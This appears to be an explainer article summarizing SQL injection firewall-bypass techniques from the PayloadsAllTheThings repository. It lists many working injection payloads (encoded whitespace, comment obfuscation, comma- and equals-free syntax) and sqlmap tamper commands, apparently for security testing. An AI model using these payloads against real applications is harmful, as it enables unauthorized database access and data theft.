Generic WAF Bypass for SQL Injection: Techniques from PayloadsAllTheThings
Generic WAF bypass techniques for SQL injection replace filtered characters—such as spaces, commas, and equal signs—with alternative whitespace, comments, or logical operators to evade signature-based Web Application Firewalls while maintaining valid database syntax.
The PayloadsAllTheThings repository by swisskyrepo is a community-driven collection of offensive security payloads and exploitation techniques. Its comprehensive SQL Injection documentation, particularly the SQL Injection/README.md file, includes a dedicated Generic WAF Bypass section that catalogs universal methods for circumventing common WAF filters regardless of the underlying database management system.
How Generic WAF Bypasses Work
Modern WAFs often rely on regular expression patterns that detect SQL keywords separated by literal spaces or specific punctuation. By substituting these filtered characters with syntactically equivalent alternatives—such as encoded control characters or comment blocks—attackers can craft payloads that databases parse correctly while WAF regex fails to match.
Generic WAF Bypass Techniques for SQL Injection
The SQL Injection/README.md file organizes bypass methods into four primary filter-evasion families. Each technique targets specific character restrictions while preserving SQL syntax validity across multiple database engines.
Bypassing Space Filters (No Space Allowed)
When WAFs block the space character (0x20), the repository documents several token-separation strategies using alternative whitespace or comment obfuscation.
Alternative Whitespace Characters — Different databases recognize various ASCII control characters as valid whitespace:
?id=1%09and%091=1%09-- (Tab %09)
?id=1%0Aand%0A1=1%0A-- (Line Feed %0A)
?id=1%0Band%0B1=1%0B-- (Vertical Tab %0B)
?id=1%0Cand%0C1=1%0C-- (Form Feed %0C)
?id=1%0Dand%0D1=1%0D-- (Carriage Return %0D)
?id=1%A0and%A01=1%A0-- (Non-Breaking Space %A0)
Comment-Based Obfuscation — SQL comments (/**/) can replace spaces between keywords:
?id=1/*comment*/AND/**/1=1/**/--
Parenthesis-Based Token Separation — Mathematical grouping can separate logical tokens without spaces:
?id=(1)and(1)=(1)--
Bypassing Comma Filters (No Comma Allowed)
When WAFs block the comma character, SQL syntax requiring list separation or LIMIT parameters must be rewritten using alternative constructs.
OFFSET Syntax — Replace LIMIT 0,1 with comma-free alternatives:
?id=1 LIMIT 1 OFFSET 0--
FROM ... FOR Syntax — Substring extraction without commas:
?id=1 AND SUBSTRING(VERSION() FROM 1 FOR 1)='5'
JOIN Constructs — Replace UNION comma separation with JOIN syntax:
UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
Bypassing Equality Filters (No Equal Allowed)
When the equals sign (=) is filtered, logical comparisons can use alternative operators that maintain boolean logic.
LIKE Operator — Pattern matching substitutes for equality:
?id=1 AND SUBSTRING(VERSION(),1,1)LIKE(5)--
IN Operator — Set membership testing:
?id=1 AND 1 IN (1)--
BETWEEN Operator — Range-based comparison:
?id=1 AND 1 BETWEEN 1 AND 1--
NOT IN Operator — Negative set matching:
?id=1 AND 1 NOT IN (2,3,4)--
Case Modification and Logical Operators
Case Variations — SQL keywords are case-insensitive in most databases:
?id=1 AnD 1=1--
?id=1 aNd 1=1--
Alternative Logical Operators — Replace AND/OR with symbolic equivalents:
?id=1 && 1=1--
?id=1 || 1=2--
Database-Specific Implementations
While generic techniques work across engines, the repository provides optimized variants in database-specific files for maximum compatibility:
SQL Injection/MySQL Injection.md— GBK double-byte encoding tricks and MySQL-specific whitespace handlingSQL Injection/PostgreSQL Injection.md— PostgreSQL-specific comment syntax and string concatenation methodsSQL Injection/DB2 Injection.md— DB2-specific WAF bypass patterns including platform-specific operator variations
Consult these files when generic payloads fail to parse due to database-specific whitespace support or syntax limitations.
Automating WAF Bypass with SQLmap
The SQL Injection/SQLmap.md file documents integration between manual bypass techniques and automated testing. SQLmap's --tamper option can automate the generic WAF bypass methods:
# Replace spaces with comments
sqlmap -u "http://target.com/?id=1" --tamper=space2comment
# Character encoding evasion
sqlmap -u "http://target.com/?id=1" --tamper=charencode
# Tab replacement
sqlmap -u "http://target.com/?id=1" --tamper=space2htab
These tamper scripts implement the encoding and comment-based evasion strategies documented in the repository's generic bypass section, allowing security professionals to test WAF resilience systematically.
Summary
- Generic WAF bypass techniques target common filter categories: spaces, commas, equality operators, and case sensitivity.
- Alternative whitespace (tabs, line feeds, non-breaking spaces) and comment obfuscation replace filtered spaces in
SQL Injection/README.md. - Comma-free syntax uses
OFFSET,FROM...FOR, andJOINconstructs to evade list-separation filters. - Equality alternatives include
LIKE,IN,BETWEEN, andNOT INoperators when=is blocked. - Database-specific optimizations are available in
MySQL Injection.md,PostgreSQL Injection.md, andDB2 Injection.md. - Automation via SQLmap tamper scripts bridges manual techniques with scalable testing.
Frequently Asked Questions
What is a generic WAF bypass for SQL injection?
A generic WAF bypass for SQL injection refers to techniques that evade Web Application Firewalls by replacing filtered characters—such as spaces, commas, or equal signs—with syntactically valid alternatives that work across multiple database management systems. These methods exploit the difference between how WAF regex signatures parse requests and how SQL parsers interpret encoded whitespace or alternative operators.
How do you bypass space filters in SQL injection?
You can bypass space filters by substituting literal spaces with alternative whitespace characters such as tabs (%09), line feeds (%0A), vertical tabs (%0B), or non-breaking spaces (%A0). Additionally, you can use SQL comments like /**/ or mathematical parentheses to separate tokens without using whitespace, as documented in the SQL Injection/README.md file under the "No Space Allowed" section.
Can SQLmap automate WAF bypass techniques?
Yes, SQLmap can automate generic WAF bypass techniques using the --tamper option, which applies transformation scripts to payloads before sending them. For example, --tamper=space2comment replaces spaces with comments, while --tamper=charencode applies character encoding evasion, directly implementing the manual techniques described in the repository's SQL Injection/SQLmap.md documentation.
Are generic WAF bypasses effective against all databases?
Generic WAF bypasses are designed to work across multiple database engines, but effectiveness varies based on specific DBMS whitespace support and syntax variations. While techniques like comment-based space replacement work universally, alternative whitespace characters such as vertical tabs or non-breaking spaces may only parse correctly in specific databases like MySQL or PostgreSQL, requiring consultation of the database-specific files like MySQL Injection.md or PostgreSQL Injection.md for optimal payload selection.
Have a question about this repo?
These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:
curl -s "https://instagit.com/install.md" Maintain an open-source project? Get it listed too →